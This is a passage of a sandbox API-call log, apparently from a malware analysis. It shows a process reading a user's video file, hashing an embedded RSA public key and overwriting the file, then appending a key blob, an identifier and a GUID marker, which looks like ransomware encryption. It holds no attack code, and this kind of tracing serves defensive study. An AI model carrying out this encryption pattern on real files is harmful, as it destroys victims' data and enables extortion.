ftCreationTime.dwLowDateTime=0x1f8e7c70, ftCreationTime.dwHighDateTime=0x1d5e378, ftLastAccessTime.dwLowDateTime=0xcdab0260, ftLastAccessTime.dwHighDateTime=0x1d5e6c5, ftLastWriteTime.dwLowDateTime=0xcdab0260, ftLastWriteTime.dwHighDateTime=0x1d5e6c5, nFileSizeHigh=0x0, nFileSizeLow=0xca09, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IBFomAmOPzHP.mp4", cAlternateFileName="IBFOMA~1.MP4")) returned 1 [0234.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e288 [0234.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e730 [0234.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e288 | out: hHeap=0x630000) returned 1 [0234.767] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\IBFomAmOPzHP.mp4") returned=".mp4" [0234.767] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\IBFomAmOPzHP.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\ibfomamopzhp.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0234.767] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=51721) returned 1 [0234.767] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0234.771] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xc9e3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.771] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0234.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.775] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0234.775] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xca09, lpOverlapped=0x0) returned 1 [0234.777] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.777] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0234.777] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.777] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.777] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0234.778] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0234.778] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0234.778] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0234.778] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0234.778] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0234.778] GetLastError () returned 0x0 [0234.778] CryptDestroyHash (hHash=0x31de170) returned 1 [0234.778] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0234.778] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.778] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0234.779] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0234.779] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.779] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0234.779] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.779] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.779] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xca10) returned 0x37c4278 [0234.779] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0234.779] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0234.779] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0234.779] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.779] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fd48 [0234.779] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0234.779] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325c6e0 [0234.779] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee8c8 [0234.779] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325c728 [0234.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee8e0 [0234.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee910 [0234.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee970 [0234.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee928 [0234.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0234.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0234.780] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0234.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0234.780] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee910 | out: hHeap=0x630000) returned 1 [0234.780] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee928 | out: hHeap=0x630000) returned 1 [0234.780] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee970 | out: hHeap=0x630000) returned 1 [0234.780] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0234.780] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee970 [0234.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0234.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee928 [0234.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0234.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee910 [0234.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0234.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31a4298 [0234.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0234.781] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0234.781] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0234.781] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0234.781] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0234.781] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0234.781] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0234.781] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee928 | out: hHeap=0x630000) returned 1 [0234.781] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0234.781] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee910 | out: hHeap=0x630000) returned 1 [0234.781] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0234.781] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0234.781] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee970 | out: hHeap=0x630000) returned 1 [0234.781] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0234.781] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0234.781] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0234.781] GetCurrentThreadId () returned 0x314 [0234.781] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31a4298 [0234.781] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c3ac0 [0234.781] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0234.781] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0234.781] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0234.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0234.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0234.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0234.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.782] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.782] GetCurrentThreadId () returned 0x314 [0234.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.782] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0234.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.782] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.782] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.782] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0234.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0234.782] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0234.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0234.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0234.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0234.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0234.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee970 [0234.783] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0234.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0234.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0234.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0234.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0234.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0234.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0234.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee910 [0234.783] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0234.783] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0234.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0234.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0234.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0234.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee928 [0234.783] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0234.783] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0234.783] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0234.784] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee8f8 [0234.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0234.784] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee988 [0234.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.784] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0234.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0234.784] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee958 [0234.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.784] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee940 [0234.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0234.784] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee9a0 [0234.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee940 | out: hHeap=0x630000) returned 1 [0234.784] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee940 [0234.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee958 | out: hHeap=0x630000) returned 1 [0234.784] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0234.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0234.784] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0234.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0234.784] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0234.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee910 | out: hHeap=0x630000) returned 1 [0234.784] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee910 [0234.785] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x37c0db8 [0234.785] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee970 | out: hHeap=0x630000) returned 1 [0234.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0234.785] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee9a0 | out: hHeap=0x630000) returned 1 [0234.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37c0fc8 [0234.785] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0234.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x72aea0 [0234.785] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0234.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0234.785] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee910 | out: hHeap=0x630000) returned 1 [0234.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5b70 [0234.785] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0234.785] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x319bc40 [0234.785] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0234.786] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0234.786] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0234.786] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0234.786] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0234.795] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0234.795] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0fc8 | out: hHeap=0x630000) returned 1 [0234.795] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.795] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0234.795] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0234.795] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee940 | out: hHeap=0x630000) returned 1 [0234.795] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0234.795] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee988 | out: hHeap=0x630000) returned 1 [0234.795] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0234.795] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee928 | out: hHeap=0x630000) returned 1 [0234.795] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee8f8 | out: hHeap=0x630000) returned 1 [0234.795] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0234.795] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0234.795] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0234.796] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee8e0 | out: hHeap=0x630000) returned 1 [0234.796] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c728 | out: hHeap=0x630000) returned 1 [0234.796] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0234.796] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0234.796] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0234.796] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0234.796] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0234.796] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.796] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0234.796] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0234.796] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0234.796] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0234.796] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.796] WriteFile (in: hFile=0x640, lpBuffer=0x37c4278*, nNumberOfBytesToWrite=0xca04, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37c4278*, lpNumberOfBytesWritten=0x3adfb14*=0xca04, lpOverlapped=0x0) returned 1 [0234.797] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c4278 | out: hHeap=0x630000) returned 1 [0234.797] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xca09, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.797] WriteFile (in: hFile=0x640, lpBuffer=0x31a4298*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31a4298*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0234.797] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0234.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e288 [0234.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0234.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0234.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37c0db8 [0234.797] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.797] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e288 | out: hHeap=0x630000) returned 1 [0234.797] WriteFile (in: hFile=0x640, lpBuffer=0x37c0db8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37c0db8*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0234.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0234.798] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0234.798] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0234.798] CloseHandle (hObject=0x640) returned 1 [0234.804] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, 